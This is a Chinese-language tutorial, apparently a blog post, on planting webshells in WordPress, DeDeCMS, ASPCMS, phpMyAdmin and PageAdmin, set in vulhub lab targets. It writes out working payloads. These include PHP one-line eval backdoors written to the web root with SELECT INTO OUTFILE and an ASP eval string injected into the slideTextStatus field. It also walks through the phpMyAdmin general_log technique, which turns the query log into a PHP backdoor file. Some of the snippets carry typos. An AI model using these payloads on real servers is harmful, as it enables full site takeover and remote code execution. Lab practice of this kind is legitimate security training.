CMS框架漏洞

一、WordPress

姿势一

1.下载vulhub靶场

bash 复制代码
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d

2.我们进入后台,网址拼接/wp-admin/

3.我们进入WP的模板写入一句话木马后门并访问其文件即可GetShell

4然后我们拼接以下路径/wp-content/themes/twentyfifteen/404.php,访问

姿势二

1.按照以下步骤上传一个包含木马的主题压缩包

2.安装成功后访问主题下的网站后门文件,拼接以下路径/wp-content/themes/qzdy-master/1.php

二、DeDeCMS

姿势一

1.我们下载安装号靶场之后打开网站并进入后台,然后按照以下步骤上传文件

2.上传成功之后,我们就可以进行webshell连接了

姿势二

1.找到模板管理的地方,我们找一个文件来加入一句话木马

2.然后将网页更新一下

3.然后访问一下,即可看到结果

姿势三

1.我们按以下步骤找到执行sql命令的地方,执行以下命令来运行

sql 复制代码
select @@basedir
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/'

三、ASPCMS

姿势一

1.下载好靶机之后,打开并进入后台。后台路径为/admin aspcms/index.asp

2.抓包后更改修改 slideTextStatus 字段的值内容,要保证人家原有的%>能够闭合

sql 复制代码
%25><%25eval (request(chr(65)))%25><%25

四、PhPMyadmin

姿势一

1.下载后靶场之后打开靶场,找到执行sql语句的地方

2.依次找到以下的地方,将日志文件打开,将日志文件的存储位置改为网站根目录

3.然后在输入sql的地方输入以下内容,然后在访问日志文件即可,也可以依次输入以下内容

sql 复制代码
show global variables like'%general%';
set global general log='on';    //日志保存状态开启
set global general log_file ='L:/phpstudy_pro/Www/888.php'    //修改日志的保存位置
show global variables like:'%general%'
select'<?php eval($ POST[cmd]);?>';

姿势二

1.依次输入以下内容,将木马写入到一个文件中去

sql 复制代码
select @@datadir
select "<?php eval($ PosT[a]);?>" into outfile 'L:/phpstudy_pro/ww/89.php'

五、Pageadmin

姿势一

1.我们下载后靶机后打开后台,找到上传模板的地方 ,上传一个包含木马的模板压缩包

姿势二

1.找到上传文件的地方,上传一个压缩后的木马文件(当然官方的可以上传)

相关推荐
程序猿编码1 分钟前
隐匿注入型ELF加壳器:原理、设计与实现深度解析(C/C++ 代码实现)
c语言·网络·c++·elf·代码注入
Echo-J1 分钟前
KVM-VMI项目编译安装全过程,包含所遇问题及解决措施
安全·网络安全·云计算·系统安全
小金鱼Y10 分钟前
🔥 前端人必看:浏览器安全核心知识点全解析(XSS/CSRF/DDoS)
前端·javascript·安全
东北甜妹21 分钟前
playbook
linux·服务器·网络
奥升新能源平台39 分钟前
奥升充电最小化高可用机房部署方案
运维·安全·开源·能源·springcloud
oi..1 小时前
Flag入门—Flag在返回包中
网络·笔记·测试工具·安全·网络安全
AI周红伟1 小时前
周红伟:现象级,OpenClaw安全防控:OpenClaw+Skills+星辰大模型安全部署、实操和企业应用实操
安全
风曦Kisaki2 小时前
#Linux进阶Day04 用户 sudo 提权、IP 地址配置、SELinux 安全管理
linux·tcp/ip·安全
阿豪学编程2 小时前
【网络】五种IO模型
网络